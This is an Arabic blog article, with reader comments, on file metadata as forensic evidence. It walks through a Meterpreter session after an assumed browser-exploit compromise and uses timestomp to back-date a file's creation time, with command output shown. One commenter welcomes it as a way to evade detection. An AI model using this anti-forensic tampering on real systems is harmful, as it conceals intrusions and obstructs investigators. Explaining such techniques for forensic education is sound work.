مواضيع عامةمواضيع ومقالات

مقال : العبث في البيانات الوصفية

تم أرشفة هذا المحتوى


أهمية البيانات الوصفية كدليل في التحقيق الجنائي الرقمي. مقال يوضح الأساليب التي يستخدمها المخربين في العبث وتعديل البيانات الوصفية الخاصة بالملفات بإستخدام أداة مثل timestomp الموجودة في مشروع ميتاسبلويت.

 

أكثر ما يحرص عليه المحقق الجنائي في حال الحصول على دليل رقمي هو عدم فتح أو تعديل الدليل حتى لا يقوم بتعديل السجلات الموجودة في البيانات الوصفية وبالذات الوقت الذي تم إنشاء فيه الملف وتعديله, وما أهمية الوقت؟ يفيدنا معرفة التوقيت حتى يساعدنا ذلك في عملية التحقيق عن الجريمة من حيث ماهي آخر الملفات التي قام الجاني بإنشائها أو تعديلها. وبشكل آخر أيضاً في حال تم اختراق جهاز ما ويريد المحقق معرفة ماهي الملفات التي قام المخترق بالعبث بها سواء من تعديل أو فتح لملف معين, لذلك أكثر ما يعرقل أي محقق جنائي هو عدم التمكن من حصول على بيانات التوقيت لأي دليل رقمي.

يستغرب بعض مستخدمي أجهزة الكاميرا من أن الصور التي قاموا بإلتقاطها عند استعراضها او تحميلها من الكاميرا مسماها ماهو الا عشر ارقام عشوائية على سبيل المثال:

1281002492.jpg

وفي الحقيقة أن هذا الرقم ماهو إلا التاريخ والوقت الذي تم إلتقاط الصورة فيه ولكن بإستخدام توقيت UNIX/POSX حيث بعد تحويله إلى توقيت عادي سوف يكون معنى العشر أرقام هذه كالتالي:

التاريخ الذي تم إلتقاط فيه الصورة: 05-08-2010

الساعة التي تم إلتقاط فيها الصورة: العاشرة صباحاً ودقيقة واحدة و 32 ثانية.

حيث إذا كانت هذه الصورة دليل رقمي قاطع تم العبث في توقيتها لتمكنا من حل هذه القضية من إسم الملف!

 

التطبيق:

سوف أقوم بشرح الطريقة التي يستخدمها أغلب المخربين وهي عن طريق الأداة Timestomp, هذه الأداة تقوم بتعديل التوقيت في البيانات الوصفية لملفات الويندوز دون ترك أي أثر وراءه ! حيث تأتي هذه الأداة مع مشروع Metasploit عند اختيار Meterpreter كـ Payload .

يمكنكم تحميله كأداة منفصلة عن طريق: اضغط هنا و الكود المصدري من هنا

لنفترض بأن المخترق قام بإختراق الجهاز بإحدى ثغرات الاكسبلورر عن طريق ميتاسبلويت :

msf exploit(ms10_002_aurora) > sessions -i 1
[*] Starting interaction with 1…
meterpreter > cd C:

وعلى سبيل المثال هناك ملف مهم او يحتوي على بيانات حساسة في المسار وإسمه SPECIAL.txt كما هو واضح في القائمة التالية:

meterpreter > ls
Listing: C:
Mode Size Type Last modified Name
—- —- —- ————- —-
100777/rwxrwxrwx 0 fil 2010-08-19 20:15:21 +0300 AUTOEXEC.BAT
100666/rw-rw-rw- 0 fil 2010-08-19 20:15:21 +0300 CONFIG.SYS
40777/rwxrwxrwx 0 dir 2010-08-19 20:19:17 +0300 Documents and Settings
100444/r–r–r– 0 fil 2010-08-19 20:15:21 +0300 IO.SYS
100444/r–r–r– 0 fil 2010-08-19 20:15:21 +0300 MSDOS.SYS
100555/r-xr-xr-x 47564 fil 2008-04-14 15:00:00 +0300 NTDETECT.COM
40555/r-xr-xr-x 0 dir 2010-08-20 18:10:41 +0300 Program Files
100666/rw-rw-rw- 77 fil 2010-10-05 20:36:37 +0300 SPECIAL.txt
40777/rwxrwxrwx 0 dir 2010-08-20 18:28:06 +0300 System Volume Information
40777/rwxrwxrwx 0 dir 2010-08-20 16:01:37 +0300 WINDOWS
100666/rw-rw-rw- 211 fil 2010-08-19 20:12:37 +0300 boot.ini
100444/r–r–r– 250048 fil 2008-04-14 15:00:00 +0300 ntldr
100666/rw-rw-rw- 1610612736 fil 2010-10-05 18:05:00 +0300 pagefile.sys

 

الآن لتشغيل Timestomp يجب علينا تشغيل هذا المودل:

meterpreter > use priv
Loading extension priv…success.

 

ثم بعد ذلك يمكننا تشغيل الأداة وإستخدامها :

meterpreter > timestomp
Usage: timestomp file_path OPTIONS
OPTIONS:
-a <opt> Set the “last accessed” time of the file
-b Set the MACE timestamps so that EnCase shows blanks
-c <opt> Set the “creation” time of the file
-e <opt> Set the “mft entry modified” time of the file
-f <opt> Set the MACE of attributes equal to the supplied file
-h Help banner
-m <opt> Set the “last written” time of the file
-r Set the MACE timestamps recursively on a directory
-v Display the UTC MACE values of the file
-z <opt> Set all four attributes (MACE) of the file

 

خصائص البرنامج واضحة لنقوم بعرض بيانات الملف SPECIAL.txt عن طريق الأداة:

meterpreter > timestomp SPECIAL.txt -v
Modified : 2010-10-05 21:36:07 +0300
Accessed : 2010-10-05 21:36:07 +0300
Created : 2010-10-05 20:35:36 +0300
Entry Modified: 2010-10-05 21:36:07 +0300

 

لنقم بتعديل التاريخ الذي تم إنشاء فيه الملف على سبيل المثال ومن ثم نستعرض البيانات الخاصة بالملف بعد تعديله:

meterpreter > timestomp SPECIAL.txt -c ’09/01/2010 13:15:33′
meterpreter > timestomp SPECIAL.txt -v
Modified : 2010-10-05 21:36:07 +0300
Accessed : 2010-10-05 21:36:07 +0300
Created : 2009-09-01 13:15:33 +0300
Entry Modified: 2010-10-05 21:36:07 +0300

هذه صورة للملف بعد تم التعديل عليه من نافذة الخصائص الخاصة بنظام ويندوز وكما يتضح فيها فإن التعديل تم بنجاح بدون التأثير على الملف أو بقية البيانات الخاصة به:

timestomp

لم أكتب هذه المقالة حتى أساعد المخربين, لكني كتبتها لتوضيح الطريقة التي تستخدمها هذه الفئة 🙂 في حال وجود أي اسألة أتمنى عدم التردد.

عن الكاتب:


ساري بخاري, طالب جامعي في قسم التحقيق الجنائي الرقمي في بريطانيا, لدي خبرة واسعة في البرمجة والحماية والتصميم والتعامل مع أنظمة اللينوكس.

مقالات ذات صلة

‫11 تعليقات

  1. ماشاء الله تبارك الله اخي ساري
    مقال رائع وطريقة جيدة لتفادي الكشف من خلال البينات الوصفية
    أكيد راح تساعدنا”لاتفهمنا غلط” ^_^
    بالتوفيق وننتظر جديدك على احر من الجمر

  2. مشاء الله مقال جميل بس هنا التحقيق الجنائي هل يستطيع معرفت هل تم استخدام هدة الاداة او لا ؟؟؟

  3. السلام عليكم
    شكرا لك أخي ساري بخاري على الموضوع
    و الله أخي كنا ننتضر مقالاتك بخصوص التحقيق الجنائي
    تحياتي لك أخي

  4. أشكرك جميعاً على تعقيبكم..

    بالنسبة عن استفسارك اخي rootsystem2010 ,
    هذا يعود لمهارة الشخص الذي قام بتعدل البيانات, فبعضهم يقوم بمسح التاريخ والوقت إجمالاً وبالتالي يقوداً إليه مباشرة, بعضهم يقوم بتعديل الوقت والتاريخ بطريقة تشتت المحقق وهنا تكمن مشكلتنا =) .. على أي حال المحقق سوف يقوم بإستكشاف جميع الملفات المرتبطة بالجريمة حتى لو اضطرينا لقراءة بعض السكتورز من الهاردسك لإستخراج بعض الملفات المخفية منها =)

  5. اشكرك على المقال و كذا تذكري بهده الاداة من مشروع Metasploit و لا اعتقد بان الادوات المجودة في metasploit تخربية .. اخي ساري المحقق xD

  6. صراحة استفدت كثيرا من مقالاتك الثقيلة العيار , أرجو ألا تكف عن افادتنا و تستمر في بث روح المعرفة في نفوسنا ,,,, حقا أحب التحقيق الجنائي الرقمي و أتمنى أن ألتحق يوما بمعهد لدراسته ,,,تحياااتي .

  7. لا اعتقد ان دليل رقمي كهذا يمكن ان يكون دليل قاطع فيمكن تزوير دليل كما يمكن الفاق تهمة بسهولة ايضا

اترك تعليقاً

لن يتم نشر عنوان بريدك الإلكتروني. الحقول الإلزامية مشار إليها بـ *

زر الذهاب إلى الأعلى